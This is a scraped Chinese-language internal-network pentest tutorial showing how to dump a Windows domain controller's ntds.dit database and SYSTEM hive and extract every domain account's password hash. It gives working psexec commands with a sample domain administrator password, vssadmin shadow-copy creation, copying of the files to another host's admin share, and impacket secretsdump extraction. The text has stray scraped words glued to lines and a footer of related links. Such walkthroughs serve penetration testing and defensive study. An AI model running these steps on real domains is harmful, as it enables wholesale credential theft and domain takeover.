內網安全:05.dump內網DC的ntds.dit,獲取hash
敘述:有時候咱們碰到一個內網環境,有DC的密碼,因而使用這個方法,導出DC中全部內網主機的密碼並破解git
0x0 環境
DC:172.31.20.30 domain用戶:pentest\administrator 密碼:UFhae&pwL%F
內網主機A(win 2012):172.31.21.166
psexec: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
secretsdump:https://github.com/SecureAuthCorp/impacket/releases
0x1 使用psexec 導出加密後的ntds.dit
使用psexec 獲取信息:
psexec /accepteula \172.31.20.30 -u pentest\administrator -p "UFhae&pwL%F" -h cmd /c "vssadmin create shadow /for=c: >> \172.31.21.166\c$\out.txt" #獲取信息且輸出到out.txt,成功github
使用psexec 導出加密後的ntds.dit:
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit \172.31.21.166\c$\"windows
使用psexec 導出加密後的system:
psexec /accepteula \172.31.20.30 -u "pentest\administrator" -p "UFhae&pwL%F" -h cmd /c "copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \172.31.21.166\c$\" 安全
咱們有了ntds.dit和system就能夠解密了dom
0x2 解密ntds.dit和system
工具是:impacket裏的secretsdump
我用的kali,這個工具windows也是支持的。。。。-------&bugfor首發:菊花槿&
kali先快速安裝:
pip install .
而後把ntds.dit和system放到secretsdump.py一塊兒執行:
secretsdump.py -ntds ntds.dit -system SYSTEM localide
掃描後拿去解密hash便可:工具
- 1. 內網安全:05.dump內網DC的ntds.dit,獲取hash
- 2. Android 獲取網頁內容
- 3. WebRTC 獲取內外網 IP
- 4. java 獲取網頁內容
- 5. 獲取本地的IP地址(內網)
- 6. 內網滲透之cookie的獲取
- 7. 內網滲透 -- 獲取內網中其他主機權限
- 8. java獲取鏡像內存、dump內存信息
- 9. xss-利用webrtc獲取內網IP
- 10. C/C++: libcurl獲取網頁內容
- 更多相關文章...
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • Eclipse 內容輔助 - Eclipse 教程
- • 互聯網組織的未來:剖析GitHub員工的任性之源
- • 三篇文章瞭解 TiDB 技術內幕——說存儲
-
每一个你不满意的现在,都有一个你没有努力的曾经。